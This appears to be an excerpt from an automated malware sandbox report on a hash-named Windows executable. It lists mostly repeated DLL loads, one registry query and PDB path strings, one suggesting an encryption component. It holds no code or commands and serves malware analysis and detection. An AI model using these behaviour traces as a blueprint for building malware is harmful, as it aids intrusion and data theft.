          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wkscli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cscapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: browcli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netapi32.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520302187.000000000310F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2509824074.000000000310F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2521536533.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2490534765.00000000036B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\&1 source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479446968.000000000316F000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2491022970.0000000003171000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479214046.0000000003157000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479352544.0000000003164000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520543452.0000000003171000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\ve\K source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000939000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\11\*jK06 source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467331598.0000000003143000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\tuciyuvowafo82\vexeyokisi\modoyisi xub.pdb source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
